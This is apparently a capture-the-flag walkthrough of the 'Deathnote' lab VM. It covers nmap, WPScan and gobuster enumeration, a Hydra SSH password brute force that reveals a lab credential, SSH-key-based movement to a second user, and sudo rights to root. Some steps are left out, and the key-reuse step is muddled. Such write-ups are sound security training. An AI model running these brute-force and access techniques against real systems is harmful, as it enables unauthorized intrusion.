From the Scan result, we have discovered our target IP address i.e. “192.168.162.6”.
Network Discovery with Nmap
Now, let's perform a network scan to detect what ports are open. Scanning the Network is already known as an essential part of the enumeration process. This offers us the opportunity to better understand the attacking surface and design targeted attacks. As in most cases, we are going to use the famous Nmap tool.
-sS: Used for TCP SYN Scan. It is a quick, default, and most popular scan, that can scan thousands of ports.
-sC: Used to perform a script scan using the default set of scripts,
-sV: Enables version detection, which will detect what versions are running on what port
-p-: Used to select all ports.
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV -sC -p- 192.168.162.6
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-07 15:42 EDT
Nmap scan report for 192.168.162.6
Host is up (0.00094s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:CF:C2:1C (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.47 seconds
┌──(kali㉿kali)-[~]
└─$
From the Network scanning, we have spotted two open ports.
Port 22/TCP runs an SSH service, which means, that if you have a valid credential then it will be easy to gain login access to the server.
Port 80/TCP running an HTTP service, which indicates that there is some vulnerable website being hosted.
Web Enumeration
So, let’s take a look at the web content running on Port 80. To look at the contents ourselves, we can open a Web Browser of our choice, and navigate to the target's IP address in the URL bar at the top of the window.
Upon attempting to access the webpage through a browser window, we are presented with the following error.
Here, we can’t connect to the server at "deathnote.vuln".
This type of error appears due to two underlying reasons.
If we have mistyped the URL address in our URL search bar so that the DNS servers can't find the associated IP address for the mistyped name
If We never entered any hostname like “deathnote.vuln” into the search bar, but the website expects us to.
Resolving Server Connection Issues by Modifying Hosts File
This type of problem can be fixed by modifying the Local DNS file named “/hosts” located in the /etc directory. Open a terminal and then type the following command to add the IP address with its associated hostname in the host's table, which would allow your web client to visit the website that was previously reporting an error.
┌──(kali㉿kali)-[~]
└─$sudo nano /etc/hosts
[sudo] password for kali:
127.0.0.1 localhost
127.0.1.1 kali
192.168.162.6 deathnote.vuln
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
Now save it using CTRL + X and hit Enter. You can verify the “/hosts” table using the following command.
┌──(kali㉿kali)-[~]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
192.168.162.6 deathnote.vuln
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
┌──(kali㉿kali)-[~]
└─$
Once this configuration is complete, we can proceed to reload the target's webpage and verify if it loads successfully or not. Since the requested hostname now has an association in your “/hosts” file, the website can load without any issues.
After analyzing the URL at the top of the window, I confirm that the running website might be created using WordPress CMS.
As per our knowledge, WordPress websites can be an easy target as they can easily be left vulnerable. So, we ran the WPScan tool on the target application to identify known vulnerabilities.
WordPress Security Assessment with WPScan
WP Scan is used to check, if the running site is vulnerable to WP version, and check if a theme and plugin is up-to-date, or known to be vulnerable.
WPScan is a black box WordPress vulnerability scanner that can be used to scan WordPress websites for known security vulnerabilities. It is written in Ruby and offers various scanning features such as plugin enumeration, theme enumeration, password brute-forcing, and vulnerability detection. WPScan helps WordPress administrators and security professionals identify and fix security issues to secure their WordPress installations against potential attacks.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Wed Sep 7 15:49:49 2022
[+] Requests Done: 186
[+] Cached Requests: 5
[+] Data Sent: 48.786 KB
[+] Data Received: 19.153 MB
[+] Memory used: 240.469 MB
[+] Elapsed time: 00:00:12
┌──(kali㉿kali)-[~]
└─$
From the output, we have noticed that the running WordPress site is not vulnerable to its WP version but we got some interesting and useful mistakes that can help us in terms of a foothold on the server.
They are like,
Headers, which indicates that the running server is hosted using Apache.
XML RPC is enabled, but it is not useful at this moment.
The WordPress readme.txt is enabled, which contains the procedure of installation of WordPress.
The Upload directory has listening enabled, which means, we can directly access the content within the WordPress directory.
Some other services are enabled, you can also have a look at them. So, let’s enumerate the target URL. There might be any hidden or hardly accessible directories and pages, and that can be done through directory Busting.
Discovery of Hidden Directories and files with Gobuster
Using gobuster as our tool of choice, we can use the following switches for the script to get the fastest, most accurate results.
dir: Used to specify the mode of enumeration,
-u: Used to specify the target URL,
-w: Used to specify the path of the wordlist.
┌──(kali㉿kali)-[~]
└─$ gobuster dir --url http://deathnote.vuln/wordpress/ --wordlist /usr/share/wordlists/dirb/common.txt
As a result of Directory busting, we obtained a WP admin page. As we don’t have a valid username and password, so we can’t get login access.
Since we have performed the directory busting on the WordPress directory, it means there might be some hidden or hardly accessible directories and pages that exist on "deathnote.vuln".
┌──(kali㉿kali)-[~]
└─$ gobuster dir --url http://deathnote.vuln/ --wordlist /usr/share/wordlists/dirb/common.txt
From the result of Directory busting, we obtained the “robots.txt” file. Let’s dig into this file, and find out if there is any sensitive information that might help us in foothold. Let’s have a look.
From “robots.txt”, we discover another hint. That hint seems to be like an image file that has been mistakenly added to the target application. So, let us open the file ‘important.jpg’ on the browser.
As a result, there seems to be like contain some error while I try to open the file. So, I decided to download the image file on our Kali machine for further analysis. So open a new terminal and then type the following command:
You can find out the downloaded file in the Kali directory.
Let me open this image file from here. As a result, you can notice that the same error occurs.
Analyzing File Types with the 'file' Command
There might be some problems with this file. Let me run this file command to determine the type of file.
┌──(kali㉿kali)-[~]
└─$ file important.jpg
important.jpg: ASCII text
┌──(kali㉿kali)-[~]
└─$
From the output, we discovered that the file is in the form of ASCII text, which means, it is a text file. So rename the file to text, and then try to open it.
The hint message indicates a piece of information that could help us log into the target application. Previously, we have seen the “user.txt” file, exist within the upload directory.
Let us open the “user.txt” file in a new tab.
As you can see, few users are listed in this wordlist. What if we had a wordlist for passwords, we could perform a brute force attack to obtain access to the network.
Foothold
While exploring the upload contents, I have identified that the “notes.txt” file might be a wordlist that may contain some passwords list.
Now, we have wordlists for usernames and passwords. So, let’s perform a Brute force attack to get a valid username with its respective password.
Before that, we have to download these files using the wget command line utility tool.
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-07 16:05:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 731 login tries (l:17/p:43), ~46 tries per task
[DATA] attacking ssh://192.168.162.6:22/
[STATUS] 271.00 tries/min, 271 tries in 00:01h, 463 to do in 00:02h, 13 active
[22][ssh] host: 192.168.162.6 login: l password: death4me
[STATUS] 277.50 tries/min, 555 tries in 00:02h, 179 to do in 00:01h, 13 active
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-07 16:08:08
┌──(kali㉿kali)-[~]
└─$
From above, we have discovered a username and it’s the password that is marked in bold.
[22][ssh] host: 192.168.162.6 login: l password: death4me
Now, we have a valid username and it’s the password to log into the server via SSH client tool. So, we can try to log into the server.
The content of the user flag seems to be like a hint, which is encoded with the help of the Brain fuck decoder Algorithm. To decode the text, we can get help from online decoders.
As you notice, a message appears after decrypting it.
Privilege Escalation
Let me run the “id” command to find out the user and group names, and numeric IDs like UID, or group ID of the current user or any other user on the server.
Since user l does not have sudo user privilege, so, we are going to identify further information about the target machine, which could be useful for gaining root access.
Let's identify the rights, and privileges of the current user by executing the sudo -l command.
l@deathnote:~$ sudo -l
[sudo] password for l:
Sorry, user l may not run sudo on deathnote.
l@deathnote:~$
The output displays that, the running user does not have the right to run the sudo command, which means, there might be another user, which consists of permission to run sudo commands.
SUID Binary Privilege Escalation via SSH Access and CyberChef Decode
To get to know, what is the name of the user, which consists of sudo permissions. You can find them, in the home directory. Run the ls command to list the directories within the /home directory.
l@deathnote:~$cd /home
l@deathnote:/home$ ls -al
total 16
drwxr-xr-x 4 root root 4096 Jul 19 2021 .
drwxr-xr-x 18 root root 4096 Jul 19 2021 ..
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 kira
drwxr-xr-x 4 l l 4096 Sep 4 2021 l
l@deathnote:/home$
There are two directories, one is Kira and another one is l. It means the user Kira might consist of the root permission.
We don't have access to the user Kira, but we can still check the files inside it.
l@deathnote:/home/kira$ ls -al
total 32
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 .
drwxr-xr-x 4 root root 4096 Jul 19 2021 ..
-rw------- 1 kira kira 0 Sep 4 2021 .bash_history
-rw-r--r-- 1 kira kira 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 kira kira 3526 Jul 19 2021 .bashrc
-rwx------ 1 kira root 85 Aug 29 2021 kira.txt
drwxr-xr-x 3 kira kira 4096 Jul 19 2021 .local
-rw-r--r-- 1 kira kira 807 Jul 19 2021 .profile
drwxr-xr-x 2 kira kira 4096 Jul 19 2021 .ssh
kira@deathnote:~$
There are no special files, except the “kira.txt” file. Let me have a look at it.
l@deathnote:/home/kira$ cat kira.txt
cat: kira.txt: Permission denied
l@deathnote:/home/kira$
This shows an error because we don’t have the right to open it. It means we have to switch the user to Kira, but we don’t have the password.
We can easily, switch to the user Kira with the help of SSH. As you can notice there is a directory named “.ssh” which contains access credentials for SSH protocol.
l@deathnote:/home/kira$cd .ssh/
l@deathnote:/home/kira/.ssh$ ls -al
total 12
drwxr-xr-x 2 kira kira 4096 Jul 19 2021 .
drwxr-xr-x 4 kira kira 4096 Sep 4 2021 ..
-rw-r--r-- 1 kira kira 393 Jul 19 2021 authorized_keys
l@deathnote:/home/kira/.ssh$
The ".ssh" directory contains an "authorized_keys" file, which means the file contains public keys for public key authentication. Let me have a look at it.
As you can see, the user l has permission to access through the SSH client Tool. Before that, we have to add this authorized key to the .ssh directory that exists within the user l directory.
l@deathnote:/home/kira/.ssh$ cd /home/l
l@deathnote:~$ ls -al
total 36
drwxr-xr-x 4 l l 4096 Sep 4 2021 .
drwxr-xr-x 4 root root 4096 Jul 19 2021 ..
-rw------- 1 l l 0 Sep 4 2021 .bash_history
-rw-r--r-- 1 l l 220 Jul 19 2021 .bash_logout
-rw-r--r-- 1 l l 3526 Jul 19 2021 .bashrc
drwxr-xr-x 3 l l 4096 Jul 19 2021 .local
-rw-r--r-- 1 l l 807 Jul 19 2021 .profile
drwxr-xr-x 2 l l 4096 Jul 19 2021 .ssh
-rw-r--r-- 1 root root 807 Jul 19 2021 user.txt
l@deathnote:~$
Create a new file for Authorized keys with the help of the vi text editor:
From the output, we have discovered that there is an “/opt” directory that might contain something special. Let me change the directory and also list the files and directory.
kira@deathnote:~$ cd /opt/
kira@deathnote:/opt$ls -al
total 12
drwxr-xr-x 3 root root 4096 Aug 29 2021 .
drwxr-xr-x 18 root root 4096 Jul 19 2021 ..
drwxr-xr-x 4 root root 4096 Aug 29 2021 L
kira@deathnote:/opt$
Here is another directory. Let me change to this directory.
kira@deathnote:/opt$ cd L
kira@deathnote:/opt/L$ls -al
total 16
drwxr-xr-x 4 root root 4096 Aug 29 2021 .
drwxr-xr-x 3 root root 4096 Aug 29 2021 ..
drwxr-xr-x 2 root root 4096 Aug 29 2021 fake-notebook-rule
drwxr-xr-x 2 root root 4096 Aug 29 2021 kira-case
kira@deathnote:/opt/L$
Directory L contains two more directories. Let’s have a look at the "fake-notebook-rule" directory.
kira@deathnote:/opt/L$ cd fake-notebook-rule/
kira@deathnote:/opt/L/fake-notebook-rule$ ls -al
total 16
drwxr-xr-x 2 root root 4096 Aug 29 2021 .
drwxr-xr-x 4 root root 4096 Aug 29 2021 ..
-rw-r--r-- 1 root root 84 Aug 29 2021 case.wav
-rw-r--r-- 1 root root 15 Aug 29 2021 hint
kira@deathnote:/opt/L/fake-notebook-rule$
The "fake notebook rule" contains two important files. Among them, one is a music file (case.wav) and another one is a hint, which is in the form of text. Let me have a look, what are the hints.
kira@deathnote:/opt/L/fake-notebook-rule$cat hint
use cyberchef
kira@deathnote:/opt/L/fake-notebook-rule$
The hint emphasizes us to use the cyberchef tool, which means there might be an encoded text that exists here.
CyberChef is an open-source web application designed to handle various cybersecurity tasks, serving as a "Swiss Army Knife" for cyber analysts and security professionals. It provides a wide range of operations, including encoding, decoding, encryption, decryption, compression, decompression, and data analysis. CyberChef offers a visual interface where users can chain together different operations to manipulate data and analyze it efficiently. It is particularly useful for tasks such as data transformation, reverse engineering, and cryptanalysis.
Let me run the file command line Utility tool to determine the type of file:
User kira may run the following commands on deathnote:
(ALL : ALL) ALL
kira@deathnote:/opt/L/fake-notebook-rule$
Kira has all permission, which means we successfully escalated the highest privilege. To obtain the root flag, simply change the directory to the /root path.
kira@deathnote:/opt/L/fake-notebook-rule$ cd /root